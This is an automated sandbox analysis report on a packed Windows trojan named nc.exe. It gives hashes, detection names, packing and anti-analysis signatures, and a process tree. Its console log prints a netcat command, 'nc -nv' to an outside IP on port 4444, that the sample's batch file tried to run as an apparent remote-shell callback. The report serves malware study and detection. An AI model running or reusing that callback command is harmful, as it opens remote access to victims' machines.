Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 17, 2024, 1:32 p.m.	Sept. 17, 2024, 1:53 p.m.

Size	69.3KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5	`1b7ee505711d9f7f8cd58b36c8bfc84d`
SHA256	`26b4ab7deb136a911001098973f32866765c9616162a748e3fbe8aa820b542ec`
CRC32	`9F9A4B66`
ssdeep	`1536:zCgt3dFSHBoO3ag6s55gprhi6WEwaZMLbBWf62BBZe/gYT:zjJPSh3qs+FiRLbEy/fT`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file

nc.exe "C:\Users\test22\AppData\Local\Temp\nc.exe"
2556
- cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\7zSCF9DDEDE\a.bat" "
  2624

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 17, 2024, 1:32 p.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 17, 2024, 1:32 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zSCF9DDEDE> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 17, 2024, 1:32 p.m.	buffer: nc console_handle: 0x00000007	1	1
WriteConsoleW Sept. 17, 2024, 1:32 p.m.	buffer: -nv 172.245.173.168 4444 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 17, 2024, 1:32 p.m.	buffer: 'nc' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 17, 2024, 1:32 p.m.		1	1	0

The executable uses a known packer (1 event)

packer

UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

Allocates read-write-execute memory (usually to unpack itself) (7 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 17, 2024, 1:32 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x733b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:32 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:32 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74631000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:32 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:32 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72db1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:32 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d74000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 17, 2024, 1:32 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732d2000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\7zSCF9DDEDE\a.bat

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00010400', u'virtual_address': u'0x00012000', u'entropy': 7.653720514095976, u'name': u'UPX1', u'virtual_size': u'0x00011000'}

entropy

7.6537205141

description

A section with a high entropy has been found

entropy

0.955882352941

description

Overall entropy of this PE file is high

The executable is compressed using UPX (2 events)

section	UPX0				description	Section name indicates UPX
section	UPX1				description	Section name indicates UPX

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Generic.4!c
Cylance	Unsafe
VirIT	Trojan.Win32.Dnldr30.XGE
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
ClamAV	Win.Trojan.Generic-9885924-0
Kaspersky	UDS:DangerousObject.Multi.Generic
McAfeeD	ti!26B4AB7DEB13
Trapmine	suspicious.low.ml.score
CTX	exe.trojan.generic
FireEye	Generic.mg.1b7ee505711d9f7f
Google	Detected
Kingsoft	malware.kb.b.785
Gridinsoft	Trojan.Win32.Agent.vb!s2
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	UDS:DangerousObject.Multi.Generic
AhnLab-V3	Malware/Win32.RL_Generic.R281345
McAfee	Artemis!1B7EE505711D
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware/Suspicious
Panda	Trj/Chgt.AD
MaxSecure	Trojan.Malware.300983.susgen

nc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All